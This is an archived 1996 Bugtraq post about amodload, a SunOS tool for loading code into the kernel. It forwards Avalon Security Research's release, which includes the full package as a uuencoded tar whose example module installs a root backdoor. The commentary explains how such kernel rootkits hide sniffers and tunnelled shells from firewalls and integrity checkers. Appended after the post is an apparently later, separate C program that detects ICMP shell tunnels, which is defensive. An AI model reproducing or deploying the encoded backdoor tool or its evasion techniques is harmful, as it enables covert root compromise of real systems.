Bugtraq mailing list archives

Re: BoS: amodload.tar.gz - dynamic SunOS modules


From: cklaus () iss net (Christopher Klaus)
Date: Thu, 20 Jun 1996 09:30:36 -0400



     Dear best-of-security () suburbia net,

     I have been asked to test amodload.  I understand Amodload will load
     modules of code into a SunOS kernel.

     I would like to know more about Amodload before I try it.

     Can you supply me with details on how it was designed and tested?
     What is the desired end result, and how can I best recover if
     something goes wrong?

BOS is probably not the place for a lot of debate, etc.  Just a quick
overview of amodload and what it means would still be useful to everyone
on BOS.  Maybe any debate should continue on bugtraq.

amodload is a quick 'hack' that demonstrates how trivial it is to load
certain modules or patches into the kernel.  The example in the amodload
package puts a backdoor into the kernel, so that you can easily
obtain root (superuser access) via a simple call.

 A more sophisticated hacker could/would replace this with something
like a sniffer.  The sniffer program would never show up in 'ps' or
anything that looks at processes.  And because the kernel can be modified,
ifconfig and CERT's cpm program can be given false information so the
machine cannot be detected in promiscuous mode.  Fortunately for hackers,
Sun has not given an easy way to detect a promiscuous Solaris box anyway.

 Another quite possible replacement for amodload is a backdoor that
tunnels a shell over a UDP/ICMP protocol.  This provides an easy way
back into a network and direct access to machines.  This bypasses many
packet-filter-based firewalls and cannot be detected by tripwire, cops, tiger or
tcpwrappers.  Only an admin carefully watching all the packets going across
their network would find this type of backdoor.

An amodload-type backdoor can be made to survive a warm reboot as well.

And because you are modifying the kernel, you can make it almost impossible
to detect a modified kernel because the kernel can change any information
about itself.  Nor has anyone released any type of tools to the public
that would even attempt to detect such backdoors.

So for today, the best defense is really to take proactive action and
prevent intruders from gaining access to your network.  This can be done
with a combination of firewalls and having a continuous security assessment
program in place where you scan your network for vulnerabilities and correct them.
You can test your own machine with a scanner from www.iss.net.


     Ben, please work with Sonia and Rick and look at capabilities.

     Thanks,
     Jack


______________________________ Forward Header __________________________________
Subject: BoS: amodload.tar.gz - dynamic SunOS modules
Author:  Mark S. Roed at PNT2
Date:    5/28/96 10:22 AM



fyi:

______________________________ Forward Header __________________________________
Subject: BoS: amodload.tar.gz - dynamic SunOS modules
Author:  best-of-security () suburbia net at smtp
Date:    5/26/96 12:45 AM



   Avalon Security Research
                        Tool Release (1) 05/16/96



 This release serves two purposes: First, to let you know of important
changes in the direction being taken by ASR and secondly to release the
first in our series of security tools.

 Whereas at first ASR was a completely not-for-profit venture, we
have recently become involved in a commercial undertaking. This change will
be transparent to our subscribers as we will continue to release various bug
reports and exploits to the security community.

 Amodload will load modules of code into a SunOS kernel. What this
amounts to is essentially a tool which would allow hackers to load arbitrary
code into the kernel which would be invisible to any conventional means of
detection. This code is offered up as a proof-of-concept tool.
We are aware of these types of tools on the Internet and in active use. In
order to counteract tools like this, we first must understand how they work.
Amodload should provide some people with this insight. This being said, it
should be noted that amodload itself can do no damage; the damage done by
amodload and tools like it is from the programs they load into the kernel. Our
example code which comes with amodload at the moment is as innocuous as
possible.


ASR <mcpheea () cadvision com>

Note: If you wish to subscribe to the ASR mailing list, send mail to
      mcpheea () cadvision com with the word SUB and *only* the word SUB
      in the body. Email directed to ASR may also be sent to
      mcpheea () cadvision com. If you wish to correspond with ASR please make
      use of the PGP key given below.


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBtAy1GTuMAAAEDAM2X2UnGZkuzT5kL8BUfiDniW6rPZgymD8IqUVy7we6Eo7Gm
H1iQBEjDoRoBBpm2nCmzOHsHVCs4ABJJH2ByoQ9mpXUZZRu0SbBVpDVQXR09qINs
Yp2GhyWA3p0z6AAOzQAFEbQbQVNSIDxtY3BoZWVhQGNhZHZpc2lvbi5jb20+
=qYbo
-----END PGP PUBLIC KEY BLOCK-----


-------------------------------------------------------------------------------




The following is an attached File item from cc:Mail.  It contains
information that had to be encoded to ensure successful transmission
through various mail systems.  To decode the file use the UUDECODE
program.
--------------------------------- Cut Here ---------------------------------
begin 644 amod.tar
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
C+TEY9:S/JKW0``L-L$B+M$B+M$B+M$A_./T_+/;S/`!X````

end



--
Christopher William Klaus            Voice: (404)252-7270. Fax: (404)252-2427
Internet Security Systems, Inc.                        "Internet Scanner finds
Ste. 115, 5871 Glenridge Dr, Atlanta, GA 30328     your network security holes
Web: http://iss.net/  Email: cklaus () iss net            before the hackers do."
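Klaus's point that only someone watching the packets will catch a shell tunnelled over ICMP is worth making concrete. The following C program is an added example (not from the original posting, the amodload package, or ISS) of the kind of check a sniffer-side monitor can apply to ICMP echo traffic: it parses raw IPv4/ICMP datagrams and flags echo packets whose data is not the incrementing filler that BSD-derived ping writes (assumed here to cover the SunOS ping as well), that look like printable shell I/O, that look like ciphertext, or that are replies nobody requested. The five datagrams, the addresses, the byte patterns and the thresholds are all constructed for the demonstration; checksums are left zero and are not verified.

```c
/*
 * icmp_echo_audit.c - heuristic audit of ICMP echo traffic for a tunnelled shell.
 * Added example; not part of the original posting or the amodload package.
 * All packets are constructed in memory so the program runs offline.
 * Build: cc -Wall -o icmp_echo_audit icmp_echo_audit.c
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICMP_ECHO_REPLY   0
#define ICMP_ECHO_REQUEST 8

/* Reasons a datagram gets flagged; combined as a bitmask. */
#define SUSPECT_NOT_FILLER  0x1  /* data is not the stock ping byte pattern */
#define SUSPECT_TEXT        0x2  /* data is mostly printable: shell I/O?    */
#define SUSPECT_DIVERSE     0x4  /* data has near-unique bytes: ciphertext? */
#define SUSPECT_UNSOLICITED 0x8  /* echo reply with no request seen for it  */

#define MAX_OUTSTANDING 64
#define NSAMPLES 5

/* Echo requests seen so far, so replies can be matched by (id, seq). */
struct echo_state {
    uint32_t key[MAX_OUTSTANDING];   /* ring buffer of (id << 16 | seq) */
    int n;
};

static uint32_t echo_key(uint16_t id, uint16_t seq) { return ((uint32_t)id << 16) | seq; }

static void remember_request(struct echo_state *st, uint16_t id, uint16_t seq)
{
    st->key[st->n % MAX_OUTSTANDING] = echo_key(id, seq);
    st->n++;
}

static int request_seen(const struct echo_state *st, uint16_t id, uint16_t seq)
{
    int limit = st->n < MAX_OUTSTANDING ? st->n : MAX_OUTSTANDING;
    for (int i = 0; i < limit; i++)
        if (st->key[i] == echo_key(id, seq)) return 1;
    return 0;
}

/* Minimal IPv4 + ICMP parse. Returns 0 if the buffer is not a sane ICMP datagram. */
static int parse_icmp(const uint8_t *pkt, size_t len, uint8_t *type, uint16_t *id,
                      uint16_t *seq, const uint8_t **data, size_t *dlen)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return 0;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t total = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || total > len || total < ihl + 8) return 0;
    if (pkt[9] != 1) return 0;                      /* IP protocol 1 = ICMP */
    const uint8_t *ic = pkt + ihl;
    *type = ic[0];
    *id   = (uint16_t)((ic[4] << 8) | ic[5]);
    *seq  = (uint16_t)((ic[6] << 8) | ic[7]);
    *data = ic + 8;
    *dlen = total - ihl - 8;
    return 1;
}

/*
 * BSD-derived ping puts a timestamp in the first 8 bytes of the echo data and
 * then fills byte i with the value i (assumption: the SunOS ping does the same).
 * Linux iputils uses a 16-byte timestamp, so both offsets are tried.  Data
 * shorter than 16 bytes cannot be checked and is reported as "not filler".
 */
static int is_ping_filler(const uint8_t *d, size_t n)
{
    if (n < 16) return 0;
    size_t starts[2] = { 8, 16 };
    for (int s = 0; s < 2; s++) {
        size_t i = starts[s];
        for (; i < n; i++)
            if (d[i] != (uint8_t)i) break;
        if (i == n) return 1;
    }
    return 0;
}

static int is_printable(uint8_t c)
{
    return (c >= 0x20 && c < 0x7f) || c == '\n' || c == '\r' || c == '\t';
}

static size_t count_printable(const uint8_t *d, size_t n)
{
    size_t k = 0;
    for (size_t i = 0; i < n; i++) k += (size_t)is_printable(d[i]);
    return k;
}

/* Crude entropy proxy: how many distinct byte values the data uses. */
static size_t count_distinct(const uint8_t *d, size_t n)
{
    uint8_t seen[256] = {0};
    size_t k = 0;
    for (size_t i = 0; i < n; i++)
        if (!seen[d[i]]) { seen[d[i]] = 1; k++; }
    return k;
}

/* Classify one datagram: SUSPECT_* mask (0 = looks like ordinary ping), -1 if malformed. */
int classify_echo(const uint8_t *pkt, size_t len, struct echo_state *st)
{
    uint8_t type; uint16_t id, seq; const uint8_t *d; size_t n;
    if (!parse_icmp(pkt, len, &type, &id, &seq, &d, &n)) return -1;
    if (type != ICMP_ECHO_REQUEST && type != ICMP_ECHO_REPLY) return 0; /* other ICMP ignored */

    int flags = 0;
    if (type == ICMP_ECHO_REQUEST)
        remember_request(st, id, seq);
    else if (!request_seen(st, id, seq))
        flags |= SUSPECT_UNSOLICITED;       /* reply arriving for no request: Loki-style inbound channel */

    if (is_ping_filler(d, n)) return flags;
    flags |= SUSPECT_NOT_FILLER;
    if (n >= 8 && count_printable(d, n) * 10 >= n * 9) {
        flags |= SUSPECT_TEXT;              /* >= 90% printable: cleartext shell traffic */
    } else if (n >= 32) {
        size_t cap = n < 256 ? n : 256;     /* at most 256 distinct values are possible */
        if (count_distinct(d, n) * 4 >= cap * 3)
            flags |= SUSPECT_DIVERSE;       /* >= 75% distinct bytes: encrypted/compressed */
    }
    return flags;
}

/* Build an IPv4/ICMP echo datagram into buf; checksums are left zero (not verified above). */
static size_t build_echo(uint8_t *buf, uint8_t type, uint16_t id, uint16_t seq,
                         const uint8_t *data, size_t dlen)
{
    size_t total = 20 + 8 + dlen;
    memset(buf, 0, total);
    buf[0] = 0x45; buf[2] = (uint8_t)(total >> 8); buf[3] = (uint8_t)total;
    buf[8] = 64; buf[9] = 1;                                /* TTL, protocol = ICMP */
    memcpy(buf + 12, "\xc0\xa8\x01\x0a", 4);                /* 192.168.1.10, constructed */
    memcpy(buf + 16, "\xc0\xa8\x01\x01", 4);                /* 192.168.1.1, constructed  */
    buf[20] = type;
    buf[24] = (uint8_t)(id >> 8);  buf[25] = (uint8_t)id;
    buf[26] = (uint8_t)(seq >> 8); buf[27] = (uint8_t)seq;
    memcpy(buf + 28, data, dlen);
    return total;
}

static int g_flags[NSAMPLES];

/* Result of the last scan for sample i, or -1 if i is out of range. */
int sample_flags(int i) { return (i >= 0 && i < NSAMPLES) ? g_flags[i] : -1; }

/* Runs the classifier over five constructed datagrams and returns how many were flagged. */
int scan_constructed_samples(void)
{
    uint8_t filler[56], cipher[64], pkt[128];
    for (size_t i = 0; i < sizeof filler; i++) filler[i] = (uint8_t)i;
    memcpy(filler, "\x33\x8a\x21\x00\x00\x0b\x3c\x4e", 8);          /* fake timeval */
    for (size_t i = 0; i < sizeof cipher; i++) cipher[i] = (uint8_t)(37 * i + 11); /* 64 distinct bytes standing in for ciphertext */
    const char *shell = "uid=0(root) gid=0(root)\n";              /* constructed shell output */

    struct echo_state st = {{0}, 0};
    size_t len;

    len = build_echo(pkt, ICMP_ECHO_REQUEST, 0x1234, 1, filler, sizeof filler);
    g_flags[0] = classify_echo(pkt, len, &st);                     /* ordinary ping */
    len = build_echo(pkt, ICMP_ECHO_REPLY, 0x1234, 1, filler, sizeof filler);
    g_flags[1] = classify_echo(pkt, len, &st);                     /* its reply */
    len = build_echo(pkt, ICMP_ECHO_REPLY, 0x1234, 2, filler, sizeof filler);
    g_flags[2] = classify_echo(pkt, len, &st);                     /* reply nobody asked for */
    len = build_echo(pkt, ICMP_ECHO_REQUEST, 0xbeef, 7, (const uint8_t *)shell, strlen(shell));
    g_flags[3] = classify_echo(pkt, len, &st);                     /* cleartext tunnelled shell */
    len = build_echo(pkt, ICMP_ECHO_REPLY, 0xbeef, 7, cipher, sizeof cipher);
    g_flags[4] = classify_echo(pkt, len, &st);                     /* encrypted tunnel reply */

    int flagged = 0;
    for (int i = 0; i < NSAMPLES; i++) if (g_flags[i] > 0) flagged++;
    return flagged;
}

int main(void)
{
    int n = scan_constructed_samples();
    for (int i = 0; i < NSAMPLES; i++)
        printf("sample %d: flags=0x%x\n", i, sample_flags(i));
    printf("%d of %d datagrams flagged\n", n, NSAMPLES);
    return 0;
}
```

The unsolicited-reply check is the one that matters most against the packet filters Klaus mentions: a filter that passes inbound echo replies so that outbound ping works will also pass a tunnel that uses replies as its inbound channel, but that tunnel never had a matching request on the wire. In real use the datagrams would come from a BPF or pcap capture rather than the constructed buffers, and a tunnel author who copies the ping filler exactly would only be caught by the request/reply bookkeeping and by volume, not by the payload checks.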


